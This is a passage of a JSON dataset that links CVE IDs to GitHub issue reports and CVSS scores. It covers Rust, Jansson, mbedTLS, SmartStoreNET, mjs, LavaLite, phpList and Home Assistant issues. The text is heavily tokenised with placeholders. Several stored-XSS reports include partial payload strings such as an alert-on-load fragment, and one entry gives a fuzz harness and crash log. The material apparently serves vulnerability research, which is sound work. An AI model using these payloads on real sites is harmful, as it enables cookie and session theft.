  60695. "baseScore": 7.5,
  60696. "impactScore": 3.6,
  60697. "exploitabilityScore": 3.9
  60698. },
  60699. {
  60700. "CVE_ID": "CVE-2020-36318",
  60701. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/79808",
  60702. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/79808",
  60703. "Repo_new": "rust-lang/rust",
  60704. "Issue_Created_At": "2020-12-07T21:12:10Z",
  60705. "description": "APITAG length NUMBERTAG underflow and bogus values from APITAG triggered by a certain sequence of APITAG APITAG APITAG APITAG APITAG This is my first bug report, so please correct me s if I miss anything : ) I use APITAG in a toy application ( URLTAG which is handling external reads in a loop, and does possible partial handling of the input. My pattern is I call reserve(N) before APITAG N times, then APITAG then doing some APITAG I noticed the app was behaving badly, and was able to generate a stand alone test case which shows the bug. The code is pretty boring and repetitive, so I put it at URLTAG to avoid spamming here. Just issue \"cargo run\" after cloning out that code, and look for the word \"BUG\" within the terminal output: According to the docs, APITAG on an empty APITAG should return None. Instead, this happens: CODETAG If I set the boolean \"do_reserve\" to be false, thus getting rid of all the APITAG calls, I get the expected behavior: CODETAG The same happens if I set \"do_make_contiguous\" to false as well so calling both I found this on Meta APITAG The below is the version I found it in, but thanks Steve Klabnik for also testing it on nightly and getting the same output. APITAG : ERRORTAG",
  60706. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  60707. "severity": "CRITICAL",
  60708. "baseScore": 9.8,
  60709. "impactScore": 5.9,
  60710. "exploitabilityScore": 3.9
  60711. },
  60712. {
  60713. "CVE_ID": "CVE-2020-36323",
  60714. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/80335",
  60715. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/80335",
  60716. "Repo_new": "rust-lang/rust",
  60717. "Issue_Created_At": "2020-12-23T16:44:23Z",
  60718. "description": "API soundness issue in APITAG implementation of Borrow APITAG ]. A weird Borrow implementation that returns a different result for each call can create a string with uninitialized bytes with APITAG URLTAG implementation of APITAG type. The problem is in APITAG URLTAG function NUMBERTAG The borrow result is first used for the length calculation. URLTAG NUMBERTAG Then, inside APITAG macro, the user provided slice is borrowed again and the content is copied. URLTAG NUMBERTAG Finally, the length of the slice is set to the length calculated in step NUMBERTAG URLTAG Playground link URLTAG , which demonstrates creating a non UTF NUMBERTAG string by only using safe Rust.",
  60719. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H",
  60720. "severity": "HIGH",
  60721. "baseScore": 8.2,
  60722. "impactScore": 4.2,
  60723. "exploitabilityScore": 3.9
  60724. },
  60725. {
  60726. "CVE_ID": "CVE-2020-36325",
  60727. "Issue_Url_old": "https://github.com/akheron/jansson/issues/548",
  60728. "Issue_Url_new": "https://github.com/akheron/jansson/issues/548",
  60729. "Repo_new": "akheron/jansson",
  60730. "Issue_Created_At": "2020-09-01T16:46:51Z",
  60731. "description": "OOB Read memory corruption bug. Hi, I encountered an OOB read memory corruption bug when fuzzing Jansson. Below you can find the crash log: ./prog detect_leaks NUMBERTAG INFO: Seed NUMBERTAG INFO: Loaded NUMBERTAG modules NUMBERTAG inline NUMBERTAG bit counters NUMBERTAG a3f NUMBERTAG a3f9a), INFO: Loaded NUMBERTAG PC tables NUMBERTAG PCs NUMBERTAG c0), INFO: max_len is not provided; APITAG will not generate inputs larger than NUMBERTAG bytes INFO: A corpus is not provided, starting from an empty corpus NUMBERTAG INITED co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG NEW co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb L NUMBERTAG MS NUMBERTAG APITAG APITAG APITAG APITAG NUMBERTAG REDUCE co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb L NUMBERTAG MS NUMBERTAG APITAG NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb NUMBERTAG pulse co NUMBERTAG ft NUMBERTAG corp NUMBERTAG b lim NUMBERTAG exec/s NUMBERTAG rss NUMBERTAG Mb APITAG APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f NUMBERTAG f4f NUMBERTAG b bp NUMBERTAG ffcf NUMBERTAG a NUMBERTAG sp NUMBERTAG ffcf NUMBERTAG T0) APITAG signal is caused by a READ memory access NUMBERTAG f NUMBERTAG f4f NUMBERTAG b in string_get PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG f3 in APITAG PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG in stream_get PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG in lex_get_save PATHTAG NUMBERTAG f NUMBERTAG f4f0a NUMBERTAG in lex_scan PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG da in APITAG PATHTAG NUMBERTAG f NUMBERTAG f4f NUMBERTAG in json_loads PATHTAG NUMBERTAG dad3 in APITAG PATHTAG NUMBERTAG a1 in APITAG char const , unsigned long) ( PATHTAG NUMBERTAG de5 in APITAG char const , unsigned long, bool, APITAG , bool ) ( PATHTAG NUMBERTAG a NUMBERTAG in APITAG ( PATHTAG NUMBERTAG ad NUMBERTAG in APITAG APITAG >&) ( PATHTAG NUMBERTAG e in APITAG , char , int ( )(unsigned char const , unsigned long)) ( PATHTAG NUMBERTAG in main ( PATHTAG NUMBERTAG f NUMBERTAG f NUMBERTAG b2 in __libc_start_main PATHTAG NUMBERTAG e4dd in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG in string_get NUMBERTAG ABORTING MS NUMBERTAG APITAG APITAG ; base unit: APITAG APITAG APITAG APITAG APITAG APITAG APITAG artifact_prefix='./'; Test unit written to ./crash APITAG Base NUMBERTAG APITAG APITAG The fuzzer I used was: include APITAG include APITAG int APITAG char Data, size_t Size) { FILE APITAG APITAG = fopen( PATHTAG \"w\"); json_t root; json_error_t error; root = APITAG NUMBERTAG error); json_dumpf(root, APITAG NUMBERTAG json_decref(root); APITAG return NUMBERTAG Kind Regards, Jordy Zomer",
  60732. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  60733. "severity": "HIGH",
  60734. "baseScore": 7.5,
  60735. "impactScore": 3.6,
  60736. "exploitabilityScore": 3.9
  60737. },
  60738. {
  60739. "CVE_ID": "CVE-2020-36327",
  60740. "Issue_Url_old": "https://github.com/rubygems/rubygems/issues/3982",
  60741. "Issue_Url_new": "https://github.com/rubygems/rubygems/issues/3982",
  60742. "Repo_new": "rubygems/rubygems",
  60743. "Issue_Created_At": "2020-09-30T18:25:40Z",
  60744. "description": "Global vs block rubygems source priority doesn't work as expected. In a situation like the following: CODETAG Bundler should try to resolve using the private source for my private gem and all of its indirect dependencies. Only if a valid resolution is not found, it should also consider APITAG for those dependencies. Insted, Bundle will still install APITAG from rubygems.org if the gem exists there. We should probably search first in the same source as APITAG before falling back. APITAG posted by MENTIONTAG in URLTAG",
  60745. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  60746. "severity": "HIGH",
  60747. "baseScore": 8.8,
  60748. "impactScore": 5.9,
  60749. "exploitabilityScore": 2.8
  60750. },
  60751. {
  60752. "CVE_ID": "CVE-2020-36364",
  60753. "Issue_Url_old": "https://github.com/smartstore/SmartStoreNET/issues/2112",
  60754. "Issue_Url_new": "https://github.com/smartstore/smartstorenet/issues/2112",
  60755. "Repo_new": "smartstore/smartstorenet",
  60756. "Issue_Created_At": "2020-10-08T12:36:16Z",
  60757. "description": "Path Traversal Vulnerability. Hello Thanks for maintaining this open source project I would like to report a path traversal vulnerability similar to: URLTAG URLTAG In the APITAG URLTAG method, the APITAG user controlled input is not validated and an attacker can perform a path traversal attack to copy an arbitrary file into a new profil and delete the original file URLTAG . FILETAG Eric",
  60758. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
  60759. "severity": "CRITICAL",
  60760. "baseScore": 9.1,
  60761. "impactScore": 5.2,
  60762. "exploitabilityScore": 3.9
  60763. },
  60764. {
  60765. "CVE_ID": "CVE-2020-36365",
  60766. "Issue_Url_old": "https://github.com/smartstore/SmartStoreNET/issues/2113",
  60767. "Issue_Url_new": "https://github.com/smartstore/smartstorenet/issues/2113",
  60768. "Repo_new": "smartstore/smartstorenet",
  60769. "Issue_Created_At": "2020-10-08T15:05:56Z",
  60770. "description": "Open redirect vulnerability in APITAG method. Hello This issue to address this open redirect vulnerability in the APITAG URLTAG method. Example: FILETAG Eric",
  60771. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  60772. "severity": "MEDIUM",
  60773. "baseScore": 6.1,
  60774. "impactScore": 2.7,
  60775. "exploitabilityScore": 2.8
  60776. },
  60777. {
  60778. "CVE_ID": "CVE-2020-36367",
  60779. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/135",
  60780. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/135",
  60781. "Repo_new": "cesanta/mjs",
  60782. "Issue_Created_At": "2019-05-28T07:23:36Z",
  60783. "description": "APITAG stack overflow on recursive stack frames: parse_block, parse_statement, parse_statement_list. An issue was discovered in mjs.c NUMBERTAG Stack Exhaustion occurs in mjs_mk_string function, and there is a stack consumption problem caused by recursive stack frames POC: FILETAG ASAN output: ERRORTAG",
  60784. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60785. "severity": "MEDIUM",
  60786. "baseScore": 5.5,
  60787. "impactScore": 3.6,
  60788. "exploitabilityScore": 1.8
  60789. },
  60790. {
  60791. "CVE_ID": "CVE-2020-36370",
  60792. "Issue_Url_old": "https://github.com/cesanta/mjs/issues/136",
  60793. "Issue_Url_new": "https://github.com/cesanta/mjs/issues/136",
  60794. "Repo_new": "cesanta/mjs",
  60795. "Issue_Created_At": "2019-05-28T07:28:05Z",
  60796. "description": "APITAG stack overflow on recursive stack frames: parse_unary, parse_mul_div_rem, parse_plus_minus.... POC: FILETAG ERRORTAG",
  60797. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  60798. "severity": "MEDIUM",
  60799. "baseScore": 5.5,
  60800. "impactScore": 3.6,
  60801. "exploitabilityScore": 1.8
  60802. },
  60803. {
  60804. "CVE_ID": "CVE-2020-36395",
  60805. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/321",
  60806. "Issue_Url_new": "https://github.com/lavalite/cms/issues/321",
  60807. "Repo_new": "lavalite/cms",
  60808. "Issue_Created_At": "2020-05-25T07:39:18Z",
  60809. "description": "Cross Site Scripting Vulnerability on APITAG feature in Lavelite. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the \"security\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG NUMBERTAG Insert payload: FILETAG APITAG APITAG load=alert(/XSS/)// APITAG // \"> APITAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
  60810. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60811. "severity": "MEDIUM",
  60812. "baseScore": 5.4,
  60813. "impactScore": 2.7,
  60814. "exploitabilityScore": 2.3
  60815. },
  60816. {
  60817. "CVE_ID": "CVE-2020-36396",
  60818. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/322",
  60819. "Issue_Url_new": "https://github.com/lavalite/cms/issues/322",
  60820. "Repo_new": "lavalite/cms",
  60821. "Issue_Created_At": "2020-05-25T07:50:11Z",
  60822. "description": "Cross Site Scripting Vulnerability on APITAG & Permissions\" feature in Lavelite..",
  60823. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60824. "severity": "MEDIUM",
  60825. "baseScore": 5.4,
  60826. "impactScore": 2.7,
  60827. "exploitabilityScore": 2.3
  60828. },
  60829. {
  60830. "CVE_ID": "CVE-2020-36397",
  60831. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/323",
  60832. "Issue_Url_new": "https://github.com/lavalite/cms/issues/323",
  60833. "Repo_new": "lavalite/cms",
  60834. "Issue_Created_At": "2020-05-25T09:06:23Z",
  60835. "description": "Cross Site Scripting Vulnerability on APITAG feature in Lavelite.. Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Click APITAG Insert payload: FILETAG APITAG APITAG load=alert('XSS')// APITAG // \"> APITAG NUMBERTAG Click APITAG NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is reflected back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG Desktop (please complete the following information): OS: Windows Browser: Firefox Version NUMBERTAG",
  60836. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60837. "severity": "MEDIUM",
  60838. "baseScore": 5.4,
  60839. "impactScore": 2.7,
  60840. "exploitabilityScore": 2.3
  60841. },
  60842. {
  60843. "CVE_ID": "CVE-2020-36398",
  60844. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/676",
  60845. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/676",
  60846. "Repo_new": "phplist/phplist3",
  60847. "Issue_Created_At": "2020-06-05T11:40:45Z",
  60848. "description": "Cross Site Scripting Vulnerability on APITAG a campaign\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG a campaign\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to PATHTAG NUMBERTAG Insert payload: FILETAG // \"> APITAG \"> APITAG NUMBERTAG Click APITAG and continue editing NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS. Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG FILETAG Insert payload FILETAG Trigger XSS FILETAG FILETAG FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version NUMBERTAG",
  60849. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60850. "severity": "MEDIUM",
  60851. "baseScore": 5.4,
  60852. "impactScore": 2.7,
  60853. "exploitabilityScore": 2.3
  60854. },
  60855. {
  60856. "CVE_ID": "CVE-2020-36399",
  60857. "Issue_Url_old": "https://github.com/phpList/phplist3/issues/675",
  60858. "Issue_Url_new": "https://github.com/phplist/phplist3/issues/675",
  60859. "Repo_new": "phplist/phplist3",
  60860. "Issue_Created_At": "2020-06-05T01:57:55Z",
  60861. "description": "Cross Site Scripting Vulnerability on APITAG rules\" feature in APITAG NUMBERTAG Describe the bug An authenticated malicious user can take advantage of a Stored XSS vulnerability in the APITAG administrators\" feature. To Reproduce Steps to reproduce the behavior NUMBERTAG Log into the panel NUMBERTAG Go to \" URLTAG NUMBERTAG Click \"rule1\" edit infomation rule NUMBERTAG Insert payload: ' APITAG NUMBERTAG Click APITAG Changes NUMBERTAG iew the preview to trigger XSS NUMBERTAG iew the preview to get in request and such Stored XSS. Expected behavior The removal of script tags is not sufficient to prevent an XSS attack. You must HTML Entity encode any output that is stored back to the page. Impact Commonly include transmitting private data, like cookies or other session information, to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user\u2019s machine under the guise of the vulnerable site. Screenshots FILETAG Insert payload FILETAG Trigger XSS FILETAG FILETAG Desktop (please complete the following information): OS: Ubuntu Browser: Firefox Version NUMBERTAG",
  60862. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  60863. "severity": "MEDIUM",
  60864. "baseScore": 5.4,
  60865. "impactScore": 2.7,
  60866. "exploitabilityScore": 2.3
  60867. },
  60868. {
  60869. "CVE_ID": "CVE-2020-36421",
  60870. "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/3394",
  60871. "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/3394",
  60872. "Repo_new": "mbed-tls/mbedtls",
  60873. "Issue_Created_At": "2020-06-04T10:32:00Z",
  60874. "description": "Leaking control flow APITAG attack). Description Type: Bug Priority: Minor Bug mbed TLS build: Version NUMBERTAG OS version: SGX Discoverers: Ivan Puddu, Moritz Schneider, Miro Haller, Srdjan Capkun, ETH Zurich (i.e., not me) Short description: The authors describe in their paper a way to determine control flow in SGX enclaves by precisely timing interrupt latency. This succeeds even in balanced branches such as: APITAG The root cause of this is that the front end of the processor fetches instructions with a NUMBERTAG byte well aligned window. The time to resume an instruction will depend on its location within this fetch window (and thus its virtual address) and instructions near it. Full description: URLTAG Solution: Remove the secret dependent branch altogether Code locations that require fixes: APITAG (bignum.c NUMBERTAG CODETAG",
  60875. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  60876. "severity": "MEDIUM",
  60877. "baseScore": 5.3,
  60878. "impactScore": 1.4,
  60879. "exploitabilityScore": 3.9
  60880. },
  60881. {
  60882. "CVE_ID": "CVE-2020-36425",
  60883. "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/3340",
  60884. "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/3340",
  60885. "Repo_new": "mbed-tls/mbedtls",
  60886. "Issue_Created_At": "2020-05-21T12:50:03Z",
  60887. "description": "It may not be necessary to check the \"revocation date\" . Description Type: Bug Bug OS ubuntu NUMBERTAG linux| mbed TLS build: Version NUMBERTAG I created a CRL whose revocation date is later than current time. APITAG does not use this CRL because it thought that the CRL is illegal (see the code in /library NUMBERTAG crt.c, line NUMBERTAG Comparatively, openssl does not check the \"revocation date\" field and revokes certificate(s). The openssl guys explained that \"revocation date\u201d is useless in certificate validation and may only be used as meta data (see URLTAG I indeed checked RFC NUMBERTAG and did not find any words saying that \"revocation date\" is important (for certificate parsing and validation). Then do we still need to check the revocation date? CODETAG The command I used is: APITAG The verification returns CODETAG Result of APITAG ERRORTAG root.pem CODETAG leaf.pem CODETAG test.crl CODETAG",
  60888. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  60889. "severity": "MEDIUM",
  60890. "baseScore": 5.3,
  60891. "impactScore": 1.4,
  60892. "exploitabilityScore": 3.9
  60893. },
  60894. {
  60895. "CVE_ID": "CVE-2020-36477",
  60896. "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/3498",
  60897. "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/3498",
  60898. "Repo_new": "mbed-tls/mbedtls",
  60899. "Issue_Created_At": "2020-07-17T10:10:04Z",
  60900. "description": "Erroneous handling of IP address SANs. Description Type: Bug Priority: Minor mbed TLS build: Version: checked on NUMBERTAG and git NUMBERTAG f4f9a8da, likely occurs on all versions that support SAN Actual behavior APITAG URLTAG treats all kinds of Subject Alternative Names equivalently, even in cases where it does not make sense. In particular, IP address SANs are compared byte by byte with whatever the value of cn is and in the typical cases it is a hostname (specifically, in the case of normal APITAG operation, it's the value configured via APITAG ). It is possible, for example, for a certificate to exist with an IP address SAN for APITAG (a perfectly valid IP owned by Verizon in the US), which would erroneously match a hostname of APITAG (an actual Polish retailer's website). While unlikely, this is seems like a possibility for certificate spoofing. This also means that it is very difficult to handle connecting to a server that actually uses an IP address SAN in its certificate, as there is no way to pass an IP address to mbed TLS when connecting. Expected behavior I would expect IP address SANs to be either ignored or compared in a more appropriate way (e.g. stringified first, perhaps?)",
  60901. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  60902. "severity": "MEDIUM",
  60903. "baseScore": 5.9,
  60904. "impactScore": 3.6,
  60905. "exploitabilityScore": 2.2
  60906. },
  60907. {
  60908. "CVE_ID": "CVE-2020-36478",
  60909. "Issue_Url_old": "https://github.com/ARMmbed/mbedtls/issues/3629",
  60910. "Issue_Url_new": "https://github.com/mbed-tls/mbedtls/issues/3629",
  60911. "Repo_new": "mbed-tls/mbedtls",
  60912. "Issue_Created_At": "2020-09-01T07:30:15Z",
  60913. "description": "Certificate verification discrepancy between APITAG and mbed TLS. Description Type: Bug Priority: Unclear A verification discrepancy found with differential fuzzing. APITAG fails to verify APITAG against the APITAG CA cert whereas mbed TLS succeeds. This might be worth looking into as it could indicate a (security) bug. Bug OS linux mbed TLS build: Latest git checkout, default configuration. Peer device TLS stack and version Not applicable Expected behavior Verification fails Actual behavior Verification succeeds Steps to reproduce Compile and run: ERRORTAG",
  60914. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  60915. "severity": "HIGH",
  60916. "baseScore": 7.5,
  60917. "impactScore": 3.6,
  60918. "exploitabilityScore": 3.9
  60919. },
  60920. {
  60921. "CVE_ID": "CVE-2020-36517",
  60922. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/6",
  60923. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/6",
  60924. "Repo_new": "home-assistant/plugin-dns",
  60925. "Issue_Created_At": "2020-10-09T08:33:09Z",
  60926. "description": "DNS server settings ignored for resolving lan hosts.. APITAG release with the issue: Frontend > Configuration > Info CODETAG Or use this command: hass version APITAG Journal logs: CODETAG Description of problem: _TLDR : After some time (X hours) , HA stops using the user defined DNS server, thus no longer being able to resolve hosts on the LAN._ HA is configured to use a local DNS server : APITAG Trying to resolve a local host fails : ERRORTAG On the DNS server side, the logs show no request arriving for that lookup. APITAG the lookup to use the specific DNS server works : CODETAG And in this case, the DNS logging indeed confirms name resolution : APITAG Doing the same on the APITAG host works without ant kind of issue : CODETAG Additional info : Doing a ha dns restart solves the issue, for a while (X hours), but it always returns to being broken. I migrated to APITAG a month or NUMBERTAG ago, previously been running Hassio for a few years. In a Hassio setup, this issue _never_ happened. APITAG based setup has had this from my first install. Pleading for help on Discord yielded very little response, no useful response at all. Others are having the same issue, and are also being ignored : URLTAG",
  60927. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60928. "severity": "HIGH",
  60929. "baseScore": 7.5,
  60930. "impactScore": 3.6,
  60931. "exploitabilityScore": 3.9
  60932. },
  60933. {
  60934. "CVE_ID": "CVE-2020-36517",
  60935. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/17",
  60936. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/17",
  60937. "Repo_new": "home-assistant/plugin-dns",
  60938. "Issue_Created_At": "2020-12-08T20:38:20Z",
  60939. "description": "DNS Plugin is ignoring my local DNS on startup. I've noticed that when I power cycle my machine running APITAG that local DNS resolution doesn't work at all. Nearly all of my ESP NUMBERTAG devices rely upon local DNS resolution so most devices stop working. The local DNS is set via DHCP. I don't set any upstream DNS, everything is supposed to be forwarded through my local DNS. I've found that I can get it resolved by running ha dns restart at which point my local DNS server starts getting used. CODETAG I've got Hassio supervisor APITAG on stable channel APITAG NUMBERTAG deployment production).",
  60940. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60941. "severity": "HIGH",
  60942. "baseScore": 7.5,
  60943. "impactScore": 3.6,
  60944. "exploitabilityScore": 3.9
  60945. },
  60946. {
  60947. "CVE_ID": "CVE-2020-36517",
  60948. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/22",
  60949. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/22",
  60950. "Repo_new": "home-assistant/plugin-dns",
  60951. "Issue_Created_At": "2021-01-18T12:01:39Z",
  60952. "description": "Use of APITAG DNS, Privacy Breach. The APITAG module is Home assistant is using APITAG DNS over TLS by default. This is basically exfilling my private data to a commercial NUMBERTAG rd party without my permission. There is no currently no way to disable this functionality. The APITAG module also attempts to lookup IP NUMBERTAG AAAA records using APITAG when IP NUMBERTAG is disabled in the supervisor network configuration. Hardcoded DNS is a breach of privacy and trust, either remove it completely, or provide an option to disable it.",
  60953. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60954. "severity": "HIGH",
  60955. "baseScore": 7.5,
  60956. "impactScore": 3.6,
  60957. "exploitabilityScore": 3.9
  60958. },
  60959. {
  60960. "CVE_ID": "CVE-2020-36517",
  60961. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/64",
  60962. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/64",
  60963. "Repo_new": "home-assistant/plugin-dns",
  60964. "Issue_Created_At": "2021-11-06T16:24:00Z",
  60965. "description": "APITAG is misconfigured leading to unexpected healthcheck behaviour. APITAG is configured to healthcheck the Cloudflare fallback every NUMBERTAG minutes, however in practice, a check is performed once a minute (and retries are generated when it fails). This is also why users have reported seeing small packet storms when Cloudflare is not reachable (by MENTIONTAG here URLTAG and MENTIONTAG here URLTAG . The intended behaviour appears to be to check once every NUMBERTAG minutes CODETAG However, that is not the only check being performed, because the encompassing server block is referenced elsewhere CODETAG A check will be run once a minute against APITAG as well as the locals (if present). We can see this is the case by enabling coredns' prometheus endpoints and pointing telegraf at them FILETAG That's failures per minute each failure represents a single query (for APITAG ) sent to APITAG . However, to APITAG (and any other upstream for that matter) it's just another query, so when it's query to it's upstream (one of APITAG or APITAG ) fails, it retries and we end up with new packets hitting the wire, one after the other. In terms of the fix, it's not clear why the fallback behaviour is implemented/hardcoded in the first place (I couldn't find any architecture discussions on it in that repo, perhaps I missed them), but the correct way to have implemented this would be one of the following options Option NUMBERTAG not include APITAG in the forwards statement at all (as it's handled by the fallback). CODETAG (It'd need some logic to handle empty locals) Option NUMBERTAG Not use a separate server block CODETAG (perhaps there some other reason an entire separate server block was stood up, but I don't see any reference to it). You could also add some config to handle APITAG locally (so the healthcheck against APITAG isn't passed upstream), but that's more horrid than the current setup. Turning off healthchecks against the locals is likely to be undesirable due to then having to wait for coredns 's timeouts if a local does go down, so I've not included that The reason this isn't a PR is because it's blocked by a decision on approach. Additional Observations Whilst capturing telemetry there were a few things I noticed which might help inform a decision on the above When in use, the Cloudflare fallback introduces a significant level of latency: FILETAG At the network level, Cloudflare is only NUMBERTAG ms away, but the average query duration for CF upstreams is half a second. The presumption is that's due to APITAG overheads, but unfortunately coredns doesn't currently expose metrics that can help verify this. I'd posit therefore that as well as fixing the healthcheck issue The choice to have cloudflare enabled/disabled should be available to the user If mandatory, the choice to use APITAG should be open to the user I like coredns , but it does feel rather out of place in an appliance it's approach to dynamic timeouts isn't really very well tuned to the foibles of domestic connections/networks.",
  60966. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  60967. "severity": "HIGH",
  60968. "baseScore": 7.5,
  60969. "impactScore": 3.6,
  60970. "exploitabilityScore": 3.9
  60971. },
  60972. {
  60973. "CVE_ID": "CVE-2020-36517",
  60974. "Issue_Url_old": "https://github.com/home-assistant/plugin-dns/issues/53",
  60975. "Issue_Url_new": "https://github.com/home-assistant/plugin-dns/issues/53",
  60976. "Repo_new": "home-assistant/plugin-dns",
  60977. "Issue_Created_At": "2021-08-17T02:16:14Z",
  60978. "description": "Don't hard code upstream DNS resolvers. Applications should not hard code their own DNS resolvers; they should use the configuration provided by the network (via DHCP) or by the user, perhaps with an overridable default if no other option exists. This is an anti pattern: URLTAG",
